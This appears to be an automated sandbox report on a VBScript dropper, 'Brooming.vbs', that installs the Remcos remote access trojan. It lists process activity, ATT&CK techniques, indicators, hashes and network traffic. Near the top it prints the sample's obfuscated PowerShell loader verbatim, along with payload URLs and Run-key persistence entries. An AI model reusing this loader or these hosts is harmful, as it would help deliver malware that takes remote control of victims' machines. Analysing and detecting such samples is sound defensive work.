              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $sarcosome; function relationsdatabasemodellen($omgngelsernes){$skinfulndustrivirksomheden=4;$skinful=$skinfulndustrivirksomheden;do{$klasselotteriets+=$omgngelsernes[$skinful];$skinful+=5} until(!$omgngelsernes[$skinful])$klasselotteriets}function woodranger($henequen){ .($ludgate) ($henequen)}$akvavitters3=relationsdatabasemodellen 'vif ns miernketbrid. sliw';$akvavitters3+=relationsdatabasemodellen 'styre oveb dspc.enel synicaboeastinconvt';$grounds=relationsdatabasemodellen 'sh,mmsammo ,dhz enbimindl elpltidsa n,n/';$komitadji=relationsdatabasemodellen 'klebt lowleft sbrie1albu2';$parodi='p al[ osencapeeeksptvild.g.nosboulelic.rtilbvamasi sa.cwindenon,pgenno bariarchnli nttinkmlit.akol n bedasnekgorcheb,virlina]rgni:fors:supesinfeerorpct lsusp nrven ivurdt unlylokap h lrgastoindht g nosti copdrostanlc ha=gibb$ m rkslaro liqm suripo,ttre,saprehdla.tjredni';$grounds+=relationsdatabasemodellen 'thr.5logg.,egl0ung d,se( rekwbasiiskrinpremd allofasewt lbs win re mn svethjem feri1denu0swit.meda0di p;vand arpw selidiskn ,vi6inst4efte;p.os tocxdobb6 unp4augu; s,o or fr pasvluna:pa,c1bldt3hjer1h mr.cont0arch)fire knacgflokecom cantik talodose/sy p2inde0varm1unde0eigh0apes1hexa0foot1sacc preff putidi prclume kv fstado pylxchil/fjer1germ3unti1slad.locu0';$sinecurist=relationsdatabasemodellen 'hemmu m,nsturkebio r per-retrat.trgfluoean,inubnht';$statsretten=relationsdatabasemodellen 'spathhjadt pstt aerpskolsudbo: fin/ myt/m veobetofturr1ch oxk ll.godpiunjucjouruconr/goblpsyndnt.ksta atc ep.lvaniijudejschabspir/depes dowh ineodecitmartsuniotanhoaretrrv nd.achep tits ,osd';$bentjs=relationsdatabasemodellen 'vilj>';$ludgate=relationsdatabasemodellen 'f eeiko,beenk x';$anticiperede='filtercigarets';$gushy='\knapmagerens.stu';woodranger (relationsdatabasemodellen 'hyp $festgusynl cowophasber da deplbegy:m nibi.ninlystd orpsuncollazyea letfrejspibe=cut.$pjase uinallevad n:afsia olipnavlpo todjam.adrjdt dera,ree+t.ea$renrgbilbuu frs g.khmosey');woodranger (relationsdatabasemodellen ' vil$ glagh nlldeltoretrbquohabarblbrn.:concmmisay prasdfilpe.ogpadditypecinfr=ferr$abiusmarmtsnebaafrutconcs tekrplaneharet port utoe nknu ie.depus,nvipoleslpap iholttdeal(exos$co cb.iogecoornett.tsul j slesitem)');woodranger (relationsdatabasemodellen $parodi);$statsretten=$myalgic[0];$pyemesis=(relationsdatabasemodellen 'draa$geckgco tl garoef ebfor.afluil nfa:resey kv obrugmbioleskrirperc=brugnfif ehalswfors- acofossbstlgjudvaenistccanatugen hov,sda,ay canshandts inemerem sce. nat$,nvear,ink t.lvdaniaulvevciseitrkutc,ndt ryge undrlavas equ3');woodranger ($pyemesis);woodranger (relationsdatabasemodellen ' omr$sl py ,ilos,pem rabeomplrirri.mys hanace r da jindcouneventrforvs sek[duel$unsusgaarifordndok ehjrncprobu ge.r u riout,sjobbtgril]kr,d=sjl.$isolgwi.rrconsostemudrftndiphd stus');$cricotus=relationsdatabasemodellen ' mid$vi uychroolgnemsodeed cer
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003831A9 FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,GetLengthSid,memset,GlobalAlloc,InitializeAcl,AddAccessAllowedAce,GetAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetSecurityDescriptorLength,MakeSelfRelativeSD,GetLastError,GlobalFree,GetLastError,FreeSid,10_2_003831A9
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003830F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid,10_2_003830F2
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,10_2_00385C84
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00389E35 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00389E35
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003863E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,10_2_003863E3
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-BNP8PO
              Source: Yara match | File source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              MITRE ATT&CK matrix (techniques listed per tactic, with the report's count badges prefixed as shown)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
              Resource Development: 321 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
              Execution: 1 Windows Management Instrumentation; 3 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 2 Service Execution; 2 PowerShell; Systemd Timers
              Persistence: 321 Scripting; 1 DLL Side-Loading; 3 Windows Service; 11 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items
              Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 3 Windows Service; 311 Process Injection; 11 Registry Run Keys / Startup Folder; RC Scripts; Startup Items
              Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 311 Process Injection
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
              Discovery: 1 System Time Discovery; 1 File and Directory Discovery; 25 System Information Discovery; 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
              Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
              Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Remote Access Software; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Multiband Communication; Commonly Used Port
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph (ID: 1578025; Sample: Brooming.vbs; Start date: 19/12/2024; Architecture: WINDOWS; Score: 100)

              Start (node 2)
                DNS/IP: 154.216.20.209 (SKHT-ASShenzhenKatherineHengTechnologyInformationCo, Seychelles); of1x.icu
                Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
                Started: powershell.exe 18 (node 8); wscript.exe 1 (node 11); remcos.exe (node 13); remcos.exe (node 15)
              powershell.exe (node 8)
                Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
                Started: msiexec.exe 2 9 (node 17); conhost.exe (node 21)
              wscript.exe (node 11)
                Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                Started: powershell.exe 14 18 (node 23)
              msiexec.exe (node 17)
                Dropped: C:\ProgramData\Remcos\remcos.exe, PE32
                Signatures: Detected Remcos RAT; Creates autostart registry keys with suspicious names
                Started: remcos.exe (node 26)
              powershell.exe (node 23)
                DNS/IP: of1x.icu 104.21.86.72, 443, 49731, 49820 (CLOUDFLARENETUS, United States)
                Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
                Started: conhost.exe (node 28)

              Source | Detection | Scanner | Label | Link
              Brooming.vbs | 13% | ReversingLabs | Script-WScript.Trojan.GuLoader |

              Source | Detection | Scanner | Label | Link
              C:\ProgramData\Remcos\remcos.exe | 0% | ReversingLabs | |

              No Antivirus matches
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              of1x.icu | 104.21.86.72 | true | false | | unknown
              s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high

              Name | Malicious | Antivirus Detection | Reputation
              https://of1x.icu/pnTClIjB/Shotstar.psd | false | Avira URL Cloud: safe | unknown
              https://of1x.icu/SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin | false | Avira URL Cloud: safe | unknown
                                unknown
                                https://of1x.icu/pnTClIjB/Shpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://of1x.icu/pnTClIjB/Shotstarpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://of1x.icu/pnTClIjB/Shotstar.powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.micro(powershell.exe, 00000004.00000002.2606853141.0000000006CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://of1x.icu/pnTCpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://of1x.icu/pnpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contoso.com/powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://of1x.icupowershell.exe, 00000002.00000002.2373287190.000001821351D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://of1x.icu/pnTClIjB/Shotspowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://of1x.icu/pnTClIjB/Shotstpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://of1x.icu/pnTClIjB/Spowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://of1x.icu/pnTClIjBpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://of1x.icupowershell.exe, 00000002.00000002.2373287190.0000018213869000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://of1x.icu/pnTClIjB/Shopowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.86.72 | of1x.icu | United States | 13335 | CLOUDFLARENETUS | false
154.216.20.209 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578025
Start date and time: 2024-12-19 07:51:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Brooming.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@12/8@1/2
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 70
• Number of non-executed functions: 43
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 4000 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2704 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3664 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:52:12 | API Interceptor | 84x Sleep call for process: powershell.exe modified
07:52:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8PO "C:\ProgramData\Remcos\remcos.exe"
07:53:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8PO "C:\ProgramData\Remcos\remcos.exe"
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 59904
Entropy (8bit): 5.770776695007155
Encrypted: false
SSDEEP: 768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
MD5: 9D09DC1EDA745A5F87553048E57620CF
SHA1: 1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
SHA-256: 3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
SHA-512: 2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, Detection: malicious, Browse
• Filename: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs, Detection: malicious, Browse
• Filename: Bnnebgers.vbs, Detection: malicious, Browse
• Filename: C7jdH7geD6.exe, Detection: malicious, Browse
• Filename: setup.exe, Detection: malicious, Browse
• Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
• Filename: sample.exe, Detection: malicious, Browse
Reputation: low
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.840877972214509
Encrypted: false
SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5: 106D01F562D751E62B702803895E93E0
SHA1: CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256: 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512: 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulnmWllZ:NllUmWl
MD5: 3EBBEC2F920D055DAC842B4FF84448FA
SHA1: 52D2AD86C481FAED6187FC7E6655C5BD646CA663
SHA-256: 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
SHA-512: 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
Malicious: false
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):421948
                                                            Entropy (8bit):5.94459731115833
                                                            Encrypted:false
                                                            SSDEEP:12288:zGO/99fzle61B9xRRAhoMyEGiyW3q+6FO6a/:Ca9fB1B9xkhoMRRawf/
                                                            MD5:06D9D0CA2E545E2472691C84122A5372
                                                            SHA1:6D1AF98A3741D350D3E3A5735C6DB3BEBEDBBA4B
                                                            SHA-256:EE746E93F909FC27907A8BF180C62F0D334E549338DA0FE7BB8EB5C229B77B5A
                                                            SHA-512:37B10F2F7176651F142ED98ACB794B4C97D7772A608861CAFA2C696085B276B0097811C0C1B394C9AABC89F4612B280689FA69058E6068C78C8C27E75BD5E3E5
                                                            Malicious:false
                                                            File type:ASCII text, with very long lines (348), with CRLF line terminators
                                                            Entropy (8bit):5.002339507145847
                                                            TrID:
                                                              File name:Brooming.vbs
                                                              File size:47'512 bytes
                                                              MD5:fbcaeb4144c55d299c7703277c01c329
                                                              SHA1:bc1b38c0454d1badf6ce204029a856a971f156c1
                                                              SHA256:6c6329c8ab3fa52c199cbbf9b270f8faaa05dc74d7f78cbd5ac8bbea61ef49bc
                                                              SHA512:b0a55cfcf5cc6a147d1b886dc5b91354ac16b63bbb3f7ee75d77567c76e5b537c141663c8688422a967a9005afebab1edeb6a53b72f5f53970f4cc49b79f0962
                                                              SSDEEP:768:s4jyyG+RN4ot+jCI5zZPoxnUMDUWnaaEUuZplI8Z9TDgAuovEKFgS:syyFMujCI5zZEnUM5a3USHLcAEAJ
                                                              TLSH:24233BA7EF68061B4D8E2769FC654F42C5BCD540411338F5FEE9138E904A8ECA3BE619
                                                              File Content Preview:..'hyphenation! attraperedes; phellum,..'Koghedt goombah. turntail, teoretisafr...'Oversupplied swayers pelsjgernes nonmoderateness;..'Trkkanals listigstes, lymphosarcomas: headachier?..'Nave, egrets?....'Hyggespreders, respelled..'Unexcitableness! supers
                                                              Icon Hash:68d69b8f86ab9a86
                                                              Timestamp:2024-12-19T07:52:55.719199+0100
                                                              SID:2803270
                                                              Signature:ETPRO MALWARE Common Downloader Header Pattern UHCa
                                                              Severity:2
                                                              Source IP:192.168.2.6
                                                              Source Port:49820
                                                              Dest IP:104.21.86.72
                                                              Dest Port:443
                                                              Protocol:TCP
                                                              Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                              Dec 19, 2024 07:52:16.934431076 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:16.934448004 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:16.950144053 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:16.950189114 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:16.950359106 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:16.950380087 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.003002882 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.003024101 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.039278984 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.039355040 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.039402008 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.039428949 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.039483070 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.050071001 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.050116062 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.050136089 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.050193071 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.050215960 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.050240040 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.058888912 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.058933020 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.059010983 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.059025049 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.059051037 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.067208052 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.067254066 CET44349731104.21.86.72192.168.2.6
